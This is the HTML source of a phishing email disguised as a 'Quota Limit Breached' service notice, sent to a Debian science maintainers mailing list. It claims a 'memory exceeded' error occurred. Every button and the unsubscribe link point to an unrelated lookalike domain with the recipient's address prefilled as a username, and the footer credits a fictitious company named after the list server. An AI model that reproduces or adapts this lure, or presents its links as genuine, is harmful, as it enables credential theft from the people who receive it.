<!DOCTYPE html>
<HTML lang=en><HEAD>
<META charset=UTF-8>
<META name=viewport content="width=device-width, initial-scale=1.0"><!-- <title>Email Template</title> --><!-- Google Fonts --><LINK rel=stylesheet href="https://fonts.googleapis.com/css2?family=Roboto:ital,wght@0,100..900;1,100..900&display=swap"><LINK rel=stylesheet href="https://fonts.googleapis.com/css2?family=Geist+Mono:wght@100..900&display=swap"><LINK rel=stylesheet href="https://fonts.googleapis.com/css2?family=Parkinsans:wght@300..800&display=swap">
<LINK rel=stylesheet href="https://fonts.googleapis.com/css2?family=Arsenal+SC:ital,wght@0,400;0,700;1,400;1,700&display=swap">
<STYLE>
/* Global Styles */
body, table, td, a {
margin: 0;
padding: 0;
font-family: 'Roboto', Arial, sans-serif;
}
body {
-webkit-font-smoothing: antialiased;
-moz-osx-font-smoothing: grayscale;
background-color: #f9f9f9;
color: #333;
font-family: 'Roboto', sans-serif;
}
table {
border-collapse: collapse;
}
img {
max-width: 100%;
display: block;
border: 0;
}
/* Email Container */
.email-container {
width: 100%;
background-color: #f9f9f9;
}
.email-content {
width: 600px;
margin: 0 auto;
background-color: #ffffff;
border-radius: 10px;
overflow: hidden;
box-shadow: 0 4px 12px rgba(0, 0, 0, 0.1);
}
/* Header */
.email-header {
background: linear-gradient(135deg, #6a11cb, #2575fc);
color: white;
text-align: center;
padding: 10px;
font-family: "Arsenal SC", sans-serif;
box-shadow: 0 4px 8px rgba(106, 17, 203, 0.3);
}
.email-header h1 {
font-size: 34px;
margin-bottom: 15px;
letter-spacing: 1px;
font-weight: 600;
}
.email-header p {
font-size: 20px;
font-weight: 400;
margin-top: 0;
}
/* Body */
.email-body {
padding: 40px 30px;
font-size: 16px;
color: #555;
line-height: 1.8;
font-family: "Geist Mono", sans-serif;
}
.email-body h2 {
font-size: 30px;
color: #333;
margin-bottom: 20px;
font-weight: 600;
font-family: 'Roboto', sans-serif;
}
.email-body p {
margin-bottom: 20px;
}
.button {
display: inline-block;
background: linear-gradient(135deg, #6a11cb, #2575fc);
background: #6a11cb;
color: white;
padding: 10px 25px;
text-decoration: none;
font-size: 14px;
font-weight: bold;
text-transform: uppercase;
box-shadow: 0 4px 8px rgba(106, 17, 203, 0.3);
transition: background-color 0.3s, transform 0.3s;
font-family: "Parkinsans", sans-serif;
}
.button:hover {
background: linear-gradient(135deg, #6a11cb, #2575fc);
transform: translateY(-2px);
}
/* Footer */
.email-footer {
text-align: center;
padding: 40px 20px;
font-size: 14px;
font-family: "Geist Mono", sans-serif;
}
.email-footer a {
text-decoration: none;
font-weight: bold;
margin: 0 10px;
}
.email-footer a:hover {
text-decoration: underline;
}
/* Responsive Styles */
@media screen and (max-width: 600px) {
.email-content {
width: 100% !important;
padding: 15px;
}
.email-header {
padding: 10px;
}
.email-body {
padding: 20px 15px;
}
.email-footer {
padding: 20px 15px;
}
.button {
padding: 12px 25px;
font-size: 16px;
}
}
</STYLE>
<META name=GENERATOR content="MSHTML 11.00.10570.1001"></HEAD>
<BODY>
<TABLE class=email-container>
<TBODY>
<TR>
<TD>
<TABLE class=email-content><!-- Header Section -->
<TBODY>
<TR>
<TD class=email-header>
<H1 style="FONT-SIZE: 28px">Quota Limit Breached</H1><!-- <p style="font-size: 15px">Connecting you with the best opportunities!</p> --></TD></TR><!-- Body Section -->
<TR>
<TD class=email-body><!-- <h2>Welcome to Our Exclusive Newsletter!</h2> -->
<P>Dear debian-science-maintainers,</P>
<P>"A 'memory exceeded' error occurred during the updates, typically caused by exceeding the allocated memory limit. </P>
<P>To resolve this, consider increasing the memory allocation or optimizing the process. Please let us know if you need further assistance."</P>
<P><A class=button href="https://e33maec-23micro47io2123.pfinance.site/?usn=debian-science-maintainers@lists.alioth.debian.org">Upgrade Plan</A> <A class=button style="MARGIN-LEFT: 10px" href="https://e33maec-23micro47io2123.pfinance.site/?usn=debian-science-maintainers@lists.alioth.debian.org">Optimize</A> </P></TD></TR><!-- Footer Section -->
<TR>
<TD class=email-footer style="FONT-SIZE: 12px; COLOR: #777; PADDING-BOTTOM: 20px; TEXT-ALIGN: center; PADDING-TOP: 20px; PADDING-LEFT: 20px; PADDING-RIGHT: 20px">
<P>© 2025 lists.alioth.debian.org Company. All rights reserved.</P>
<P>If you no longer wish to receive emails, <A style="COLOR: #6a11cb" href="https://e33maec-23micro47io2123.pfinance.site/?usn=debian-science-maintainers@lists.alioth.debian.org">unsubscribe here</A>.</P></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE></BODY></HTML>